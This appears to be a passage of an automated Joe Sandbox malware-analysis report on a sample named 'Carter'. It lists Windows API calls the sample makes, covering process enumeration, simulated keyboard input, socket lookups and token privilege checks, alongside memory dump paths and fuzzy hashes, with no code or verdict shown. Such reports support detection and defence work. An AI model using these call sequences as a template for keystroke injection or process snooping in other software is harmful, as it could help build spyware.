                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                        • String ID:
                                                                        • API String ID: 314563124-0
                                                                        • Opcode ID: 3696b2e6c7318b5af73962c18fa52acd026404f054e69acbe7d04539ed270df5
                                                                        • Instruction ID: 493d190b1d1780a41e7f45f9351432d6c2c70d7a6684cdbf78fc03dd4932b15a
                                                                        • Opcode Fuzzy Hash: 3696b2e6c7318b5af73962c18fa52acd026404f054e69acbe7d04539ed270df5
                                                                        • Instruction Fuzzy Hash: 3F812B71A00109EFCB04DF98C984EEEB7B9FF89315F148599F545AB260DB71AE05CB60
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: cbf658f0e4f75b486b526b69a969d80b1bf4910914246c54a582ffff6b6011f5
                                                                        • Instruction ID: bfca8f633ceb2266b70f6755206a775881e664c93816cf05ce21685d859c47a5
                                                                        • Opcode Fuzzy Hash: cbf658f0e4f75b486b526b69a969d80b1bf4910914246c54a582ffff6b6011f5
                                                                        • Instruction Fuzzy Hash: 9051D6B06007439BDB249F79C8A4A6DB7ECAF99310F20881FE5C6D76E1DB7498409B05
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0105F526
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0105F534
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0105F5F4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0105F603
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                        • String ID:
                                                                        • API String ID: 2576544623-0
                                                                        • Opcode ID: 618a7ed423114dfcd850960fcfd260c962b84383fce2ece648baa9443da4dcb5
                                                                        • Instruction ID: d46e3823dcc6f66cd343f9c47c0e2d025b3059e62928e0c0ea94faa3d6b00dcd
                                                                        • Opcode Fuzzy Hash: 618a7ed423114dfcd850960fcfd260c962b84383fce2ece648baa9443da4dcb5
                                                                        • Instruction Fuzzy Hash: B0518C71504351AFD360EF24DC85EABB7E8FF98700F00491DFA85972A1EB74A904CB92
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 2782032738-0
                                                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                        • Instruction ID: 82f75519d6f3cc7453336a992cbe9e8e8963dbcbc25cb59cd84b5613b1b8ddd1
                                                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                        • Instruction Fuzzy Hash: ED41A571A04606ABFB6ACEADC8809AE7BE5AF45260F14817DE7D5C76C0D7709D808B48
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0103A68A
                                                                        • __itow.LIBCMT ref: 0103A6BB
                                                                          • Part of subcall function 0103A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0103A976
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0103A724
                                                                        • __itow.LIBCMT ref: 0103A77B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 42876b213e3debc92ed20464a0d4f5894f21c0f7e44fdf50a880c94aaad20574
                                                                        • Instruction ID: 188300b6b33e9803136fb1fb6b95930a7414efce0b12b4220efccead335ce2fc
                                                                        • Opcode Fuzzy Hash: 42876b213e3debc92ed20464a0d4f5894f21c0f7e44fdf50a880c94aaad20574
                                                                        • Instruction Fuzzy Hash: 8A417D74A00209EBDF21EF54CC95BFE7BB9BF88750F000069BA85A3291DB749944DAA1
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 010570BC
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010570CC
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01057130
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0105713C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                        • String ID:
                                                                        • API String ID: 2214342067-0
                                                                        • Opcode ID: 370ad70a9f5d2391751a43cb4c7c7bbc1084638f50f7078b3235dcd3119b237e
                                                                        • Instruction ID: e66a55b3d873da258c5d0e0f4ec23d8d790cdada5f08654d641da13f14f7e5ca
                                                                        • Opcode Fuzzy Hash: 370ad70a9f5d2391751a43cb4c7c7bbc1084638f50f7078b3235dcd3119b237e
                                                                        • Instruction Fuzzy Hash: 2F41C3757002006FE760AF29DC86F2A77E99B44B10F04815CFA599F3C2DA79AC009B91
                                                                        APIs
                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,01070980), ref: 01056B92
                                                                        • _strlen.LIBCMT ref: 01056BC4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID:
                                                                        • API String ID: 4218353326-0
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01068F03
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0106B1D2
                                                                        • GetWindowRect.USER32(?,?), ref: 0106B248
                                                                        • PtInRect.USER32(?,?,0106C6BC), ref: 0106B258
                                                                        • MessageBeep.USER32(00000000), ref: 0106B2C9
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01041326
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 01041342
                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010413A8
                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 010413FA
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 01041465
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 01041481
                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 010414E0
                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 01041532
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0101642B
                                                                        • __isleadbyte_l.LIBCMT ref: 01016459
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 01016487
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 010164BD
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 0106553F
                                                                          • Part of subcall function 01043B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01043B4E
                                                                          • Part of subcall function 01043B34: GetCurrentThreadId.KERNEL32 ref: 01043B55
                                                                          • Part of subcall function 01043B34: AttachThreadInput.USER32(00000000,?,010455C0), ref: 01043B5C
                                                                        • GetCaretPos.USER32(?), ref: 01065550
                                                                        • ClientToScreen.USER32(00000000,?), ref: 0106558B
                                                                        • GetForegroundWindow.USER32 ref: 01065591
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetCursorPos.USER32(?), ref: 0106CB7A
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0101BCEC,?,?,?,?,?), ref: 0106CB8F
                                                                        • GetCursorPos.USER32(?), ref: 0106CBDC
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0101BCEC,?,?,?), ref: 0106CC16
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        APIs
                                                                        • __setmode.LIBCMT ref: 01000BE2
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01047E51,?,?,00000000), ref: 00FF4041
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01047E51,?,?,00000000,?,?), ref: 00FF4065
                                                                        • _fprintf.LIBCMT ref: 01000C19
                                                                        • OutputDebugStringW.KERNEL32(?), ref: 0103694C
                                                                          • Part of subcall function 01004CCA: _flsall.LIBCMT ref: 01004CE3
                                                                        • __setmode.LIBCMT ref: 01000C4E
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                        • String ID:
                                                                        • API String ID: 521402451-0
                                                                        APIs
                                                                          • Part of subcall function 01038D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01038D3F
                                                                          • Part of subcall function 01038D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01038D49
                                                                          • Part of subcall function 01038D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D58
                                                                          • Part of subcall function 01038D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D5F
                                                                          • Part of subcall function 01038D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01038D75
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010392C1
                                                                        • _memcmp.LIBCMT ref: 010392E4
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0103931A
                                                                        • HeapFree.KERNEL32(00000000), ref: 01039321
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                        • String ID:
                                                                        • API String ID: 1592001646-0
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 010663BD
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010663D7
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 010663E5
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 010663F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 675bfd87e6cfa59d484ac61a1bd3c0648655ea961ea8861004b3861ba27e9965
                                                                        • Instruction ID: 7c3b440aeffd50f2c1f70f05c6c2ba24dd90ee763b41cd45dc54a617e017afad
                                                                        • Opcode Fuzzy Hash: 675bfd87e6cfa59d484ac61a1bd3c0648655ea961ea8861004b3861ba27e9965
                                                                        • Instruction Fuzzy Hash: C911D631701524AFD715AB18CC44FBA779DEF85320F148218F556D72D1CBB6AD01C795
                                                                        APIs
                                                                          • Part of subcall function 0103F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?), ref: 0103F867
                                                                          • Part of subcall function 0103F858: lstrcpyW.KERNEL32(00000000,?,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103F88D
                                                                          • Part of subcall function 0103F858: lstrcmpiW.KERNEL32(00000000,?,0103E46F,?,?,?,0103F262,00000000,000000EF,00000119,?,?), ref: 0103F8BE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E488
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E4AE
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0103F262,00000000,000000EF,00000119,?,?,00000000), ref: 0103E4E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: 190447b9850571c678da08f4c4741f1e5a7e5f59c39e7a7c1619eb7f32c4cadd
                                                                        • Instruction ID: 59194969d5622e94f6e435e8e8b3cd5dee58592bae0d4ce4228bfaa43645b238
                                                                        • Opcode Fuzzy Hash: 190447b9850571c678da08f4c4741f1e5a7e5f59c39e7a7c1619eb7f32c4cadd
                                                                        • Instruction Fuzzy Hash: 4211D336200345AFDB25AF28DC44D7A77ADFF86350B40816AF886CB294FB719940C791
                                                                        APIs
                                                                        • _free.LIBCMT ref: 01015331
                                                                          • Part of subcall function 0100593C: __FF_MSGBANNER.LIBCMT ref: 01005953
                                                                          • Part of subcall function 0100593C: __NMSG_WRITE.LIBCMT ref: 0100595A
                                                                          • Part of subcall function 0100593C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 0da758894c5a764ca65908821820af358f71b7f5773040afa5211800b394e822
                                                                        • Instruction ID: 4973823fbadeb115b47986f75f328ae04a2ef010056248ec415075ab95dc0f26
                                                                        • Opcode Fuzzy Hash: 0da758894c5a764ca65908821820af358f71b7f5773040afa5211800b394e822
                                                                        • Instruction Fuzzy Hash: 6D11E732905616AFDB763F74AC0469E3BD8BF62260F10C62BF9C89F198DA7D85408790
                                                                        APIs
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01047E51,?,?,00000000), ref: 00FF4041
                                                                          • Part of subcall function 00FF402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01047E51,?,?,00000000,?,?), ref: 00FF4065
                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 01056A84
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056A8F
                                                                        • _memmove.LIBCMT ref: 01056ABC
                                                                        • inet_ntoa.WSOCK32(?), ref: 01056AC7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 1504782959-0
                                                                        • Opcode ID: 05327d5c3a8cd9d21945208a8e33e5fa58d7144ca32ccc8deec3814c31afa770
                                                                        • Instruction ID: 13d61eb71ff8c761c551ae0072b065e86f4dea5d76080366d35cabe51dc32a7e
                                                                        • Opcode Fuzzy Hash: 05327d5c3a8cd9d21945208a8e33e5fa58d7144ca32ccc8deec3814c31afa770
                                                                        • Instruction Fuzzy Hash: BF116376900109AFCB50FBA5CD45CEEB7B8EF19310B044169FA42A72A1DF75AE04DBA1
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00FE16B4
                                                                        • GetClientRect.USER32(?,?), ref: 0101B93C
                                                                        • GetCursorPos.USER32(?), ref: 0101B946
                                                                        • ScreenToClient.USER32(?,?), ref: 0101B951
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: 204681a2d05690ba8309f69d29e8aa56a439f5d07f55e7ee790a02852eaf7973
                                                                        • Instruction ID: 693ce7bbd67b0af46488ace82fb30eaae2c9788eefffdb665237c61a7f5c4b79
                                                                        • Opcode Fuzzy Hash: 204681a2d05690ba8309f69d29e8aa56a439f5d07f55e7ee790a02852eaf7973
                                                                        • Instruction Fuzzy Hash: F5115536A00059AFCB10EFAAC885DFE77B8FB45300F904545F981E7140C339BA51EBA1
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01039719
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0103972B
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01039741
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0103975C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 33ea288e21d16e802a5f25c605a324bc97753dd429de4994668fe17080471c8d
                                                                        • Instruction ID: 823d06442fd8dd16ad549d7b84fefd170e1cafc4da2b341e16c0561cfa0e93c4
                                                                        • Opcode Fuzzy Hash: 33ea288e21d16e802a5f25c605a324bc97753dd429de4994668fe17080471c8d
                                                                        • Instruction Fuzzy Hash: A8115A39900218FFEB11DF99C984EEDBBB8FB48710F204091EA00B7294D6716E11DB90
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                        • GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: 08ca118d036b608ea4576bf2bfeb8ba063e4c26fa4901c50855ea0bbab7c3a97
                                                                        • Instruction ID: 00785f1d9d32d9be47f7c231b830be1ca14c7dca773a103cda6893018e7b43dd
                                                                        • Opcode Fuzzy Hash: 08ca118d036b608ea4576bf2bfeb8ba063e4c26fa4901c50855ea0bbab7c3a97
                                                                        • Instruction Fuzzy Hash: 64118B7290268DBFDB524F919C40EEABB6DFF5A764F040211FA0452008E73A9D60EBA0
                                                                        APIs
